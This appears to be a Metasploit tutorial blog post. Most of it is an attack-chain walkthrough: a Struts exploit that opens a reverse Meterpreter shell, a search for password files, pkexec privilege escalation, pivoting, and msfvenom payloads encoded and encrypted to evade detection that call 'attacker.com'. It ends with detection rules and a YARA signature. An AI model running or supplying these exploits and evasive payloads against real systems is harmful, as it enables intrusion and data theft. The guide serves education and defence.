Metasploit Framework: Complete Beginner to Advanced Guide 2026 — HackerXone

Disclaimer: This content is for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper written authorization before conducting penetration tests.

In June 2026, Metasploit Framework remains the undisputed champion of penetration testing tools, powering everything from junior pentester assessments to sophisticated red team operations. With the recent release of Metasploit 7.x and its enhanced evasion capabilities, understanding this framework has never been more critical for security professionals.

This comprehensive guide will take you from your first msfconsole launch to advanced post-exploitation techniques, custom module development, and real-world attack chain construction. Whether you’re preparing for OSCP, building your red team toolkit, or strengthening your organization’s defenses by understanding attacker methodologies, this guide delivers actionable knowledge.

Understanding Metasploit Architecture

Before diving into commands, understanding Metasploit’s architecture separates competent operators from script kiddies. The framework operates on a modular architecture comprising several key components:

  • Exploits: Code that takes advantage of vulnerabilities to gain access
  • Payloads: Code delivered and executed on the target after successful exploitation
  • Auxiliary Modules: Supporting modules for scanning, fuzzing, and enumeration
  • Post-Exploitation Modules: Actions performed after gaining initial access
  • Encoders: Transform payloads to evade detection
  • Nops: No-operation instructions for payload padding

The framework’s database backend (PostgreSQL) enables persistent storage of discovered hosts, services, credentials, and loot across engagements. This becomes invaluable during multi-day assessments.

Installation and Initial Configuration

While Metasploit comes pre-installed on Kali Linux 2026.2, proper configuration maximizes effectiveness. Here’s the complete setup process:

# Update Metasploit to latest version
sudo apt update && sudo apt install metasploit-framework

# Initialize the database
sudo msfdb init

# Verify database connectivity
sudo msfdb status

# Launch msfconsole
msfconsole

# Inside msfconsole, verify database connection
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.

For enterprise deployments, consider configuring Metasploit with external PostgreSQL instances and implementing workspace isolation for multi-client engagements.

Essential Commands and Workflow

Mastering Metasploit requires fluency in its command structure. The following workflow represents a typical penetration testing engagement:

Workspace Management

Workspaces isolate data between engagements, preventing cross-contamination of findings:

# Create a new workspace for the engagement
msf6 > workspace -a client_acme_2026
[*] Added workspace: client_acme_2026
[*] Workspace: client_acme_2026

# List all workspaces
msf6 > workspace
  default
* client_acme_2026

# Switch between workspaces
msf6 > workspace default
[*] Workspace: default

# Delete a workspace when engagement concludes
msf6 > workspace -d old_engagement

Target Discovery and Enumeration

Metasploit’s auxiliary modules provide powerful reconnaissance capabilities that integrate directly with the database:

# Import Nmap scan results
msf6 > db_import /path/to/nmap_scan.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.15.4'
[*] Importing host 192.168.1.100
[*] Importing host 192.168.1.101

# View discovered hosts
msf6 > hosts

Hosts
=====

address         mac                name       os_name    os_flavor  os_sp  purpose  info
-------         ---                ----       -------    ---------  -----  -------  ----
192.168.1.100   00:0c:29:4a:2b:3c  dc01       Windows    2022       SP0    server
192.168.1.101   00:0c:29:5d:6e:7f  webserver  Linux      Ubuntu     22.04  server

# View discovered services
msf6 > services

Services
========

host            port   proto  name         state  info
----            ----   -----  ----         -----  ----
192.168.1.100   445    tcp    microsoft-ds open   Windows Server 2022
192.168.1.100   88     tcp    kerberos     open
192.168.1.101   80     tcp    http         open   Apache httpd 2.4.52
192.168.1.101   22     tcp    ssh          open   OpenSSH 8.9p1

# Run auxiliary scanner directly
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.0/24
msf6 auxiliary(scanner/smb/smb_version) > run

Exploitation Fundamentals

With targets enumerated, exploitation begins. Understanding the exploit-payload relationship is critical for success.

Selecting and Configuring Exploits

The search command is your primary tool for finding relevant exploits:

# Search for exploits by CVE
msf6 > search cve:2024-21413

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/windows/fileformat/outlook_moniker     2024-02-13       excellent  No     Microsoft Outlook Moniker Link RCE

# Search by platform and type
msf6 > search type:exploit platform:windows smb

# Search by description keywords
msf6 > search eternal blue

# Get detailed information about a module
msf6 > info exploit/windows/smb/ms17_010_eternalblue

Understanding Payload Types

Payload selection significantly impacts operation success. Metasploit offers three payload categories:

  • Singles: Self-contained payloads (e.g., windows/exec)
  • Stagers: Small payloads that establish connection for larger stages (e.g., windows/meterpreter/reverse_tcp)
  • Stages: Downloaded by stagers, contain full functionality

For modern environments with EDR solutions, stageless payloads often perform better:

# Compare staged vs stageless payloads
msf6 > use payload/windows/x64/meterpreter/reverse_tcp
# Staged: smaller initial payload, downloads meterpreter stage

msf6 > use payload/windows/x64/meterpreter_reverse_tcp
# Stageless: complete payload, single transmission

Real-World Attack Scenario: Corporate Network Penetration

Let’s walk through a realistic attack chain against a corporate environment with proper authorization. This scenario demonstrates methodology rather than specific vulnerabilities.

Phase 1: Initial Access via Web Application

# Scenario: Discovered vulnerable Apache Struts server
msf6 > use exploit/multi/http/struts2_content_type_ognl
msf6 exploit(multi/http/struts2_content_type_ognl) > set RHOSTS 192.168.1.101
msf6 exploit(multi/http/struts2_content_type_ognl) > set RPORT 8080
msf6 exploit(multi/http/struts2_content_type_ognl) > set TARGETURI /struts2-showcase/
msf6 exploit(multi/http/struts2_content_type_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/struts2_content_type_ognl) > set LHOST 10.10.14.50
msf6 exploit(multi/http/struts2_content_type_ognl) > set LPORT 443
msf6 exploit(multi/http/struts2_content_type_ognl) > exploit

[*] Started reverse TCP handler on 10.10.14.50:443
[*] Sending exploit request...
[*] Sending stage (3045380 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (10.10.14.50:443 -> 192.168.1.101:49521)

meterpreter >

Phase 2: Post-Exploitation Enumeration

# Basic system information
meterpreter > sysinfo
Computer     : webserver
OS           : Ubuntu 22.04 (Linux 5.15.0-91-generic)
Architecture : x64
Meterpreter  : x64/linux

# Check current user privileges
meterpreter > getuid
Server username: www-data

# Enumerate network configuration
meterpreter > ifconfig

Interface  1
============
Name         : eth0
Hardware MAC : 00:0c:29:5d:6e:7f
IPv4 Address : 192.168.1.101
IPv4 Netmask : 255.255.255.0

# Search for sensitive files
meterpreter > search -f *.conf -d /etc
meterpreter > search -f *password* -d /var/www

# Upload enumeration scripts
meterpreter > upload /opt/linpeas.sh /tmp/
meterpreter > shell
$ chmod +x /tmp/linpeas.sh && /tmp/linpeas.sh

Phase 3: Privilege Escalation

# Return to meterpreter and check for local exploits
meterpreter > background
[*] Backgrounding session 1...

msf6 > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.101 - Collecting local exploits for x64/linux...
[*] 192.168.1.101 - 42 exploit checks are being tried...
[+] 192.168.1.101 - exploit/linux/local/pkexec: The target appears to be vulnerable.
[+] 192.168.1.101 - exploit/linux/local/sudo_baron_samedit: The target appears to be vulnerable.

# Attempt privilege escalation
msf6 > use exploit/linux/local/pkexec
msf6 exploit(linux/local/pkexec) > set SESSION 1
msf6 exploit(linux/local/pkexec) > set LHOST 10.10.14.50
msf6 exploit(linux/local/pkexec) > set LPORT 4444
msf6 exploit(linux/local/pkexec) > exploit

[*] Started reverse TCP handler on 10.10.14.50:4444
[*] Running automatic check...
[+] The target appears to be vulnerable.
[*] Executing exploit...
[*] Sending stage (3045380 bytes) to 192.168.1.101
[*] Meterpreter session 2 opened

meterpreter > getuid
Server username: root

Phase 4: Lateral Movement

With root access on the web server, pivot to internal network targets:

# Add route through compromised host
msf6 > use post/multi/manage/autoroute
msf6 post(multi/manage/autoroute) > set SESSION 2
msf6 post(multi/manage/autoroute) > set SUBNET 10.10.10.0
msf6 post(multi/manage/autoroute) > run

[*] Running module against webserver
[*] Adding route to 10.10.10.0/255.255.255.0 via 192.168.1.101
[+] Route added successfully.

# Set up SOCKS proxy for tool pivoting
msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 9050
msf6 auxiliary(server/socks_proxy) > run -j

# Scan internal network through pivot
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.10.10.0/24
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 22,80,443,445,3389
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 10.10.10.50:445 - TCP OPEN
[+] 10.10.10.50:3389 - TCP OPEN

Advanced Techniques: Evasion and Custom Payloads

Modern environments deploy sophisticated detection capabilities. Metasploit 7.x introduces enhanced evasion techniques:

Payload Encoding and Encryption

# Generate encoded payload with multiple iterations (the tool is msfvenom, one word)
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=attacker.com LPORT=443 \
  -e x64/xor_dynamic -i 5 \
  -f exe -o payload.exe

# Generate encrypted payload (Metasploit 7.x)
# AES-256 takes a 32-byte key, so request 16 random bytes rendered as 32 hex characters
msfvenom -p windows/x64/meterpreter/reverse_https \
  LHOST=attacker.com LPORT=443 \
  --encrypt aes256 --encrypt-key $(openssl rand -hex 16) \
  -f exe -o encrypted_payload.exe

# Use payload within resource script for automation
cat << 'EOF' > engagement.rc
workspace -a target_corp
db_import /tmp/nmap_results.xml
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS file:/tmp/smb_targets.txt
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.14.50
set LPORT 443
set AutoRunScript post/windows/manage/migrate
run -j
EOF

msfconsole -r engagement.rc

Custom Module Development

For unique vulnerabilities, custom module development becomes necessary:

# Basic auxiliary module template
# Save to ~/.msf4/modules/auxiliary/scanner/custom/example.rb
# (msfconsole loads ~/.msf4/modules at start; run `reload_all` after editing)

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient   # provides send_request_cgi, rport, target_uri
  include Msf::Auxiliary::Scanner            # calls run_host(ip) once per RHOSTS entry
  include Msf::Auxiliary::Report             # report_vuln writes to the workspace database

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom Vulnerability Scanner',
      'Description'    => %q{
        This module scans for a custom vulnerability in target application.
      },
      'Author'         => ['Your Name'],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2026-XXXX'],
        ['URL', 'https://example.com/advisory']
      ]
    ))

    register_options([
      OptString.new('TARGETURI', [true, 'Path to vulnerable application', '/']),
    ])
  end

  def run_host(ip)
    uri = normalize_uri(target_uri.path, 'vulnerable_endpoint')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => uri,
    })

    # res is nil when the host never answers (timeout or refused connection)
    if res && res.code == 200 && res.body.include?('vulnerable_pattern')
      print_good("#{ip}:#{rport} - Vulnerable!")
      report_vuln(
        host: ip,
        port: rport,
        name: 'Custom Vulnerability',
        refs: references
      )
    else
      print_status("#{ip}:#{rport} - Not vulnerable")
    end
  end
end

Defense Strategies: Detecting Metasploit Activity

Understanding attacker tools enables better defense. Here’s how defenders can detect and prevent Metasploit-based attacks:

Network-Level Detection

  • Monitor for default Meterpreter traffic patterns: Default staging protocols have identifiable signatures
  • Implement SSL/TLS inspection: Meterpreter HTTPS traffic often uses self-signed certificates
  • Deploy network segmentation: Limit lateral movement opportunities
  • Alert on unusual port usage: Common Metasploit ports (4444, 5555, 8080) should trigger alerts
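As an added example (not from the original post), a small Python detector for the first two bullets above: it walks constructed Zeek-style conn.log and ssl.log records and flags outbound flows to the listed handler ports and TLS sessions that present a self-signed certificate with no SNI. The log field subset and the 192.168.0.0/16 internal range are assumptions.

```python
import ipaddress

# Constructed Zeek-style conn.log records (subset of fields):
# ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto, service
CONN_LOG = """\
1717920000.10\tCabc1\t192.168.1.101\t49521\t10.10.14.50\t443\ttcp\tssl
1717920001.20\tCabc2\t192.168.1.101\t49530\t10.10.14.50\t4444\ttcp\t-
1717920002.30\tCabc3\t192.168.1.55\t50111\t93.184.216.34\t443\ttcp\tssl
1717920003.40\tCabc4\t192.168.1.77\t50200\t10.10.14.50\t8080\ttcp\thttp
"""
# Constructed Zeek-style ssl.log records: uid, server_name (SNI), validation_status
SSL_LOG = """\
Cabc1\t-\tself signed certificate
Cabc3\twww.example.com\tok
"""
# Handler ports the page lists as common Metasploit defaults (tune per environment)
METASPLOIT_PORTS = {4444, 5555, 8080}
INTERNAL = ipaddress.ip_network("192.168.0.0/16")  # assumed internal range

def parse_conn(text):
    rows = []
    for line in text.splitlines():
        _ts, uid, src, _sport, dst, dport, _proto, service = line.split("\t")
        rows.append({"uid": uid, "src": src, "dst": dst, "dport": int(dport), "service": service})
    return rows

def parse_ssl(text):
    sessions = {}
    for line in text.splitlines():
        uid, sni, status = line.split("\t")
        sessions[uid] = {"sni": sni, "status": status}
    return sessions

def detect(conn_text, ssl_text):
    """Return (uid, reason) pairs for outbound connections that merit triage."""
    alerts = []
    ssl = parse_ssl(ssl_text)
    for c in parse_conn(conn_text):
        src, dst = ipaddress.ip_address(c["src"]), ipaddress.ip_address(c["dst"])
        if src not in INTERNAL or dst in INTERNAL:
            continue  # reverse shells call out, so only outbound flows are checked
        if c["dport"] in METASPLOIT_PORTS:
            alerts.append((c["uid"], f"outbound to common Metasploit handler port {c['dport']}"))
        s = ssl.get(c["uid"])
        # A self-signed server cert with no SNI is typical of a default reverse_https
        # handler and uncommon for legitimate browsing, which cuts false positives
        if s and "self signed" in s["status"] and s["sni"] == "-":
            alerts.append((c["uid"], "TLS session with self-signed certificate and no SNI"))
    return alerts
```

Run `detect(CONN_LOG, SSL_LOG)` to get the three flagged sessions; feeding it real Zeek exports only requires selecting the same columns.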

Endpoint Detection

# YARA rule for detecting Meterpreter artifacts
# The MZ header is kept as a structural check only; on its own it matches every PE,
# so the condition requires one of the Meterpreter-specific strings as well.
rule Meterpreter_Reflective_Loader {
    meta:
        description = "Detects Meterpreter reflective DLL loader"
        author = "HackerXone Research"
        date = "2026-06-09"

    strings:
        $mz = { 4D 5A 90 00 03 00 00 00 }
        $s1 = "ReflectiveLoader" ascii wide
        $s2 = "metsrv" ascii wide

    condition:
        uint16(0) == 0x5A4D and $mz at 0 and any of ($s*)
}

Proactive Security Measures

  1. Patch management: Most Metasploit exploits target known vulnerabilities with available patches
  2. Network segmentation: Implement zero-trust architecture limiting lateral movement
  3. EDR deployment: Modern EDR solutions detect common Meterpreter behaviors
  4. Application whitelisting: Prevent execution of unauthorized binaries
  5. Regular penetration testing: Use Metasploit yourself to find weaknesses before attackers do

Metasploit Pro vs Framework: Enterprise Considerations

For organizational deployments, Metasploit Pro offers significant advantages:

  • Web interface: Accessible to less CLI-proficient team members
  • Automated reporting: Generate compliance-ready documentation
  • Team collaboration: Shared workspaces and findings
  • Credential management: Secure storage and reuse across engagements
  • Social engineering campaigns: Built-in phishing capabilities

However, the open-source Framework remains essential for advanced operators requiring custom module development and maximum flexibility.

Key Takeaways

  • Master the fundamentals: Understanding Metasploit’s architecture (exploits, payloads, auxiliaries, post modules) before attempting advanced techniques ensures consistent success
  • Database integration is critical: Always initialize and utilize the PostgreSQL database for persistent storage of findings across engagement phases
  • Workspace discipline prevents mistakes: Create separate workspaces for each engagement to maintain data isolation and client confidentiality
  • Payload selection impacts success: Choose between staged and stageless payloads based on target environment, EDR presence, and network conditions
  • Evasion requires constant evolution: Default payloads trigger most security solutions; invest time in encoding, encryption, and custom development
  • Defenders benefit from attacker knowledge: Understanding Metasploit techniques enables better detection rules, incident response, and security architecture decisions
  • Documentation enables reproducibility: Use resource scripts to automate and document attack chains for reporting and team knowledge sharing
  • Ethical boundaries are non-negotiable: Always maintain written authorization and operate within defined scope—skills demonstrated here are powerful and demand responsibility

Metasploit Framework continues evolving with the threat landscape. As we move through 2026, staying current with new modules, evasion techniques, and defensive countermeasures remains essential for security professionals on both sides of the engagement.

Happy hunting—and stay ethical.
